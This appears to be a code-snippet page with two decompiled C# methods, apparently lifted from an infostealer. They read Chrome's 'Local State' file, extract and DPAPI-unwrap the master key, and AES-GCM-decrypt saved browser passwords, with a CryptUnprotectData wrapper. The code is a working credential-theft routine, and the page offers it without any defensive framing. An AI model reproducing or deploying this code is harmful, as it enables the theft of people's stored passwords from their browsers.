예제 #1
0
        // Token: 0x06000080 RID: 128 RVA: 0x00006CC0 File Offset: 0x00004EC0
        public static string decryptChrome(string password, string browser = "")
        {
            if (password.StartsWith("v10") || password.StartsWith("v11"))
            {
                string   path  = "";
                string[] array = new string[]
                {
                    "",
                    "\\..",
                    "\\..\\.."
                };
                foreach (string str in array)
                {
                    path = Path.GetDirectoryName(browser) + str + "\\Local State";
                    if (File.Exists(path))
                    {
                        break;
                    }
                    path = null;
                }
                string   text   = File.ReadAllText(path);
                string[] array3 = Regex.Split(text, "\"");
                int      num    = 0;
                foreach (string a in array3)
                {
                    if (a == "encrypted_key")
                    {
                        text = array3[num + 2];
                        break;
                    }
                    num++;
                }
                byte[] key = DecryptAPI.DecryptBrowsers(Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(text)).Remove(0, 5)), null);
                try
                {
                    string s     = password.Substring(3, 12);
                    string s2    = password.Substring(15);
                    byte[] bytes = Encoding.Default.GetBytes(s);
                    return(AesGcm256.Decrypt(Encoding.Default.GetBytes(s2), key, bytes));
                }
                catch
                {
                    return("failed (AES-GCM)");
                }
            }
            string result;

            try
            {
                result = Encoding.Default.GetString(DecryptAPI.DecryptBrowsers(Encoding.Default.GetBytes(password), null));
            }
            catch
            {
                result = "failed (DPAPI)";
            }
            return(result);
        }
예제 #2
0
        // Token: 0x06000003 RID: 3 RVA: 0x000024D4 File Offset: 0x000006D4
        public static byte[] DecryptBrowsers(byte[] cipherTextBytes, byte[] entropyBytes = null)
        {
            DecryptAPI.DataBlob dataBlob  = default(DecryptAPI.DataBlob);
            DecryptAPI.DataBlob dataBlob2 = default(DecryptAPI.DataBlob);
            DecryptAPI.DataBlob dataBlob3 = default(DecryptAPI.DataBlob);
            DecryptAPI.CryptprotectPromptstruct cryptprotectPromptstruct = new DecryptAPI.CryptprotectPromptstruct
            {
                cbSize        = Marshal.SizeOf(typeof(DecryptAPI.CryptprotectPromptstruct)),
                dwPromptFlags = 0,
                hwndApp       = IntPtr.Zero,
                szPrompt      = null
            };
            string empty = string.Empty;

            try
            {
                try
                {
                    if (cipherTextBytes == null)
                    {
                        cipherTextBytes = new byte[0];
                    }
                    dataBlob2.pbData = Marshal.AllocHGlobal(cipherTextBytes.Length);
                    dataBlob2.cbData = cipherTextBytes.Length;
                    Marshal.Copy(cipherTextBytes, 0, dataBlob2.pbData, cipherTextBytes.Length);
                }
                catch
                {
                }
                try
                {
                    if (entropyBytes == null)
                    {
                        entropyBytes = new byte[0];
                    }
                    dataBlob3.pbData = Marshal.AllocHGlobal(entropyBytes.Length);
                    dataBlob3.cbData = entropyBytes.Length;
                    Marshal.Copy(entropyBytes, 0, dataBlob3.pbData, entropyBytes.Length);
                }
                catch
                {
                }
                DecryptAPI.CryptUnprotectData(ref dataBlob2, ref empty, ref dataBlob3, IntPtr.Zero, ref cryptprotectPromptstruct, 1, ref dataBlob);
                byte[] array = new byte[dataBlob.cbData];
                Marshal.Copy(dataBlob.pbData, array, 0, dataBlob.cbData);
                return(array);
            }
            catch
            {
            }
            finally
            {
                if (dataBlob.pbData != IntPtr.Zero)
                {
                    Marshal.FreeHGlobal(dataBlob.pbData);
                }
                if (dataBlob2.pbData != IntPtr.Zero)
                {
                    Marshal.FreeHGlobal(dataBlob2.pbData);
                }
                if (dataBlob3.pbData != IntPtr.Zero)
                {
                    Marshal.FreeHGlobal(dataBlob3.pbData);
                }
            }
            return(new byte[0]);
        }